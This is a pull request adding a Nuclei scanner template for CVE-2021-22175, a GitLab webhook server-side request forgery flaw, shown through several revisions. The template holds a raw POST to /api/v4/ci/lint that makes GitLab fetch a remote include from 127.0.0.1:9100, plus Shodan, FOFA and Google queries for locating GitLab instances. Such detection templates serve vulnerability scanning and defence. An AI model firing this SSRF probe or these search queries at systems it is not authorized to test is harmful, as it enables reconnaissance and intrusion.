### PR TITLE
Create CVE-2021-22175.yaml

### DIFF
--- a/http/cves/2021/CVE-2021-22175.yaml
+++ b/http/cves/2021/CVE-2021-22175.yaml
@@ -4,8 +4,8 @@ info:
   name: GitLab Webhooks Service-Side Request Forgery Vulnerability
   author: CodeStuffBreakThings
   severity: critical
-  description: GitLab CE/EE versions 10.5.0 to 13.6.7, 13.7.0 to 13.7.6, and 13.8.0 to 13.8.3 contain a server-side request forgery (SSRF) vulnerability that could be exploited by an unauthenticated attacker to send requests to the internal network. This vulnerability occurs in the webhook functionality of GitLab, even on instances where user registration is disabled, allowing potential unauthorized access to internal services.
-  remediation: Upgrade GitLab to a newer version. This vulnerability is patched in 13.6.7, 13.7.7, and 13.8.4.
+  description: GitLab CE/EE versions 10.5.0 to 13.6.6, 13.7.0 to 13.7.6, and 13.8.0 to 13.8.3 contain a server-side request forgery (SSRF) vulnerability that could be exploited by an unauthenticated attacker to send requests to the internal network. This vulnerability occurs in the webhook functionality of GitLab, even on instances where user registration is disabled, allowing potential unauthorized access to internal services.
+  remediation: Upgrade GitLab to a newer version. This vulnerability is patched in 13.6.7, 13.7.7, and 13.8.4. Alternatively, disable the "Allow requests to the local network from webhooks and integrations" setting.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2021-22175
     - https://gitlab.com/gitlab-org/cves/-/blob/master/2021/CVE-2021-22175.json
@@ -16,6 +16,13 @@ info:
     cvss-score: 9.8
     cve-id: CVE-2021-22175
     cwe-id: CWE-918
+    epss-score: 0.00845
+    epss-percentile: 0.82644
+    cpe: cpe:2.3:a:gitlab:gitlab:::::*:::*
+  metadata:
+    shodan-query:
+      - title:"GitLab"
+      - cpe:"cpe:2.3:a:gitlab:gitlab"
   tags: cve2021,cve,gitlab,ssrf
 
 http:

--- a/http/cves/2021/CVE-2021-22175.yaml
+++ b/http/cves/2021/CVE-2021-22175.yaml
@@ -4,7 +4,8 @@ info:
   name: GitLab Webhooks Server-Side Request Forgery Vulnerability
   author: CodeStuffBreakThings
   severity: critical
-  description: GitLab CE/EE versions 10.5.0 to 13.6.6, 13.7.0 to 13.7.6, and 13.8.0 to 13.8.3 contain a server-side request forgery (SSRF) vulnerability that could be exploited by an unauthenticated attacker to send requests to the internal network. This vulnerability occurs in the webhook functionality of GitLab, even on instances where user registration is disabled, allowing potential unauthorized access to internal services.
+  description: |
+    GitLab CE/EE versions 10.5.0 to 13.6.6, 13.7.0 to 13.7.6, and 13.8.0 to 13.8.3 contain a server-side request forgery (SSRF) vulnerability that could be exploited by an unauthenticated attacker to send requests to the internal network. This vulnerability occurs in the webhook functionality of GitLab, even on instances where user registration is disabled, allowing potential unauthorized access to internal services.
   remediation: Upgrade GitLab to a newer version. This vulnerability is patched in 13.6.7, 13.7.7, and 13.8.4. Alternatively, disable the "Allow requests to the local network from webhooks and integrations" setting.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2021-22175
@@ -18,12 +19,26 @@ info:
     cwe-id: CWE-918
     epss-score: 0.00845
     epss-percentile: 0.82644
-    cpe: cpe:2.3:a:gitlab:gitlab:::::*:::*
+    cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*
   metadata:
+    verified: true
+    max-request: 1
+    vendor: gitlab
+    product: gitlab
     shodan-query:
-      - title:"GitLab"
+      - http.title:"gitlab"
       - cpe:"cpe:2.3:a:gitlab:gitlab"
-  tags: cve2021,cve,gitlab,ssrf
+      - http.html:"gitlab enterprise edition"
+      - http.html:"gitlab-ci.yml"
+    fofa-query:
+      - body="gitlab enterprise edition"
+      - body="gitlab-ci.yml"
+      - title="gitlab"
+    google-query: intitle:"gitlab"
+  tags: cve,cve2021,cve,gitlab,ssrf
+
+variables:
+  rand: "{{to_lower(rand_text_alpha(8))}}"
 
 http:
   - raw:
@@ -32,11 +47,12 @@ http:
         Host: {{Hostname}}
         Content-Type: application/json
 
-        { "include_merged_yaml": true, "content": "include:\n  remote: 'http://127.0.0.1:9100/notarealfilenuclei.yml'" }
+        { "include_merged_yaml": true, "content": "include:\n  remote: 'http://127.0.0.1:9100/{{rand}}.yml'" }
 
     matchers:
       - type: dsl
         dsl:
           - 'status_code == 200'
           - 'contains(body, "does not have valid YAML syntax")'
+          - 'contains(content_type, "application/json")'
         condition: and

--- a/http/cves/2021/CVE-2021-22175.yaml
+++ b/http/cves/2021/CVE-2021-22175.yaml
@@ -1,0 +1,35 @@
+id: CVE-2021-22175
+
+info:
+  name: GitLab Webhooks Service-Side Request Forgery Vulnerability
+  author: CodeStuffBreakThings
+  severity: critical
+  description: GitLab CE/EE versions 10.5.0 to 13.6.7, 13.7.0 to 13.7.6, and 13.8.0 to 13.8.3 contain a server-side request forgery (SSRF) vulnerability that could be exploited by an unauthenticated attacker to send requests to the internal network. This vulnerability occurs in the webhook functionality of GitLab, even on instances where user registration is disabled, allowing potential unauthorized access to internal services.
+  remediation: Upgrade GitLab to a newer version. This vulnerability is patched in 13.6.7, 13.7.7, and 13.8.4.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-22175
+    - https://gitlab.com/gitlab-org/cves/-/blob/master/2021/CVE-2021-22175.json
+    - https://gitlab.com/gitlab-org/gitlab/-/issues/294178
+    - https://hackerone.com/reports/1059596
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2021-22175
+    cwe-id: CWE-918
+  tags: cve2021,cve,gitlab,ssrf
+
+http:
+  - raw:
+      - |
+        POST /api/v4/ci/lint HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        { "include_merged_yaml": true, "content": "include:\n  remote: 'http://127.0.0.1:9100/notarealfilenuclei.yml'" }
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, "does not have valid YAML syntax")'
+        condition: and

--- a/http/cves/2021/CVE-2021-22175.yaml
+++ b/http/cves/2021/CVE-2021-22175.yaml
@@ -1,7 +1,7 @@
 id: CVE-2021-22175
 
 info:
-  name: GitLab Webhooks Service-Side Request Forgery Vulnerability
+  name: GitLab Webhooks Server-Side Request Forgery Vulnerability
   author: CodeStuffBreakThings
   severity: critical
   description: GitLab CE/EE versions 10.5.0 to 13.6.6, 13.7.0 to 13.7.6, and 13.8.0 to 13.8.3 contain a server-side request forgery (SSRF) vulnerability that could be exploited by an unauthenticated attacker to send requests to the internal network. This vulnerability occurs in the webhook functionality of GitLab, even on instances where user registration is disabled, allowing potential unauthorized access to internal services.


### PR DESCRIPTION
### Template / PR Information
- Created CVE-2021-22175.yaml
- References:
  - https://nvd.nist.gov/vuln/detail/CVE-2021-22175
  - https://gitlab.com/gitlab-org/cves/-/blob/master/2021/CVE-2021-22175.json
  - https://gitlab.com/gitlab-org/gitlab/-/issues/294178
  - https://hackerone.com/reports/1059596

/claim #11182 

### Template Validation

I've validated this template locally?
- [X] YES
- [ ] NO


#### Additional Details (leave it blank if not applicable)
This vulnerability is exploitable when the impacted GitLab versions have the [Allow requests to the local network from webhooks and integrations](https://docs.gitlab.com/ee/security/webhooks.html#allow-requests-to-the-local-network-from-webhooks-and-integrations) setting enabled.

In this detection template, the vulnerable GitLab instance sends an HTTP request to the GitLab Node Exporter which is bound to 127.0.0.1:9100 by default

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)